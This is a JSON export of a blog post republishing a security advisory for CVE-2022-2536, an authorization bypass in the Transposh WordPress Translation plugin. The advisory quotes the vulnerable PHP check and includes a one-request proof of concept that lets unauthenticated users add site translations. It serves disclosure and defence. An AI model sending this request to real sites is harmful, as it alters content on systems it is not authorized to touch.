{"id":29441,"date":"2022-08-19T23:59:58","date_gmt":"2022-08-19T19:59:58","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168120\/wptransposh1081-authz.txt"},"modified":"2022-08-24T08:36:29","modified_gmt":"2022-08-24T04:06:29","slug":"transposh-wordpress-translation-1-0-8-1-incorrect-authorization","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/transposh-wordpress-translation-1-0-8-1-incorrect-authorization\/","title":{"rendered":"Transposh WordPress Translation 1.0.8.1 Incorrect Authorization"},"content":{"rendered":"<p dir=\"ltr\">RCE Security Advisory<br \/>\nhttps:\/\/www.rcesecurity.com<\/p>\n<p dir=\"ltr\">1. ADVISORY INFORMATION<br \/>\n=======================<br \/>\nProduct: Transposh WordPress Translation<br \/>\nVendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/<br \/>\nType: Incorrect Authorization [CWE-863]\nDate found: 2022-07-23<br \/>\nDate published: 2022-08-16<br \/>\nCVSSv3 Score: 7.5 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:N)<br \/>\nCVE: CVE-2022-2536<\/p>\n<p dir=\"ltr\">2. CREDITS<br \/>\n==========<br \/>\nThis vulnerability was discovered and researched by Julien Ahrens from<br \/>\nRCE Security.<\/p>\n<p dir=\"ltr\">3. VERSIONS AFFECTED<br \/>\n====================<br \/>\nTransposh WordPress Translation 1.0.8.1 and below<\/p>\n<p dir=\"ltr\">4. INTRODUCTION<br \/>\n===============<br \/>\nTransposh translation filter for WordPress offers a unique approach to blog<br \/>\ntranslation. It allows your blog to combine automatic translation with human<br \/>\ntranslation aided by your users with an easy to use in-context interface.<\/p>\n<p dir=\"ltr\">(from the vendor&#8217;s homepage)<\/p>\n<p dir=\"ltr\">5. VULNERABILITY DETAILS<br \/>\n========================<br \/>\nWhen installed, Transposh comes with a set of pre-configured options; one of these<br \/>\nis the &#8220;Who can translate&#8221; setting under the &#8220;Settings&#8221; tab. However, this option<br \/>\nis ignored if Transposh has enabled its &#8220;autotranslate&#8221; feature (it&#8217;s enabled by<br \/>\ndefault) and the HTTP POST parameter &#8220;sr0&#8221; is larger than 0. This is caused by a<br \/>\nfaulty validation in &#8220;wp\/transposh_db.php&#8221;:<\/p>\n<p dir=\"ltr\">if (!$by &amp;&amp; !($all_editable &amp;&amp;<br \/>\n($this-&gt;transposh-&gt;is_translator() || ($source &gt; 0 &amp;&amp; $this-&gt;transposh-&gt;options-&gt;enable_autotranslate)))) {<br \/>\ntp_logger(&#8220;Unauthorized translation attempt &#8221; . $_SERVER[&#8216;REMOTE_ADDR&#8217;], 1);<br \/>\nheader(&#8220;HTTP\/1.0 401 Unauthorized translation&#8221;);<br \/>\nexit;<br \/>\n}<\/p>\n<p dir=\"ltr\">Successful exploits can allow an unauthenticated attacker to bypass the Transposh<br \/>\npermissions and add translations to the WordPress site, thereby influencing what<br \/>\nis shown on the site. However, this only affects new translations.<\/p>\n<p dir=\"ltr\">6. PROOF OF CONCEPT<br \/>\n===================<br \/>\nThe following Proof-of-Concept adds a new translation<\/p>\n<p dir=\"ltr\">POST \/wp-admin\/admin-ajax.php HTTP\/1.1<br \/>\nHost: [host]\nContent-Length: 74<br \/>\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>\nUser-Agent: Mozilla\/5.0<br \/>\nConnection: close<\/p>\n<p dir=\"ltr\">action=tp_translation&amp;ln0=en&amp;sr0=1&amp;items=1&amp;tk0=translation&amp;tr0=translation<\/p>\n<p dir=\"ltr\">7. SOLUTION<br \/>\n===========<br \/>\nNone. Remove the plugin to prevent exploitation.<\/p>\n<p dir=\"ltr\">8. REPORT TIMELINE<br \/>\n==================<br \/>\n2022-07-23: Discovery of the vulnerability<br \/>\n2022-07-23: CVE requested from Wordfence (CNA)<br \/>\n2022-07-25: Wordfence assigns CVE-2022-2536<br \/>\n2022-08-09: Sent note to vendor<br \/>\n2022-08-09: Vendor is aware of this bug, but there is no plan to fix it yet<br \/>\n2022-08-16: Public Disclosure<\/p>\n<p dir=\"ltr\">9. REFERENCES<br \/>\n=============<br \/>\nhttps:\/\/github.com\/MrTuxracer\/advisories<\/p>\n","protected":false},"excerpt":{"rendered":"<p>RCE Security Advisory https:\/\/www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/ Type: Incorrect Authorization [CWE-863] Date found: 2022-07-23 Date published: 2022-08-16 CVSSv3 Score: 7.5 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:N) CVE: CVE-2022-2536 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29441","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29441"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29441\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29441"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29441"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}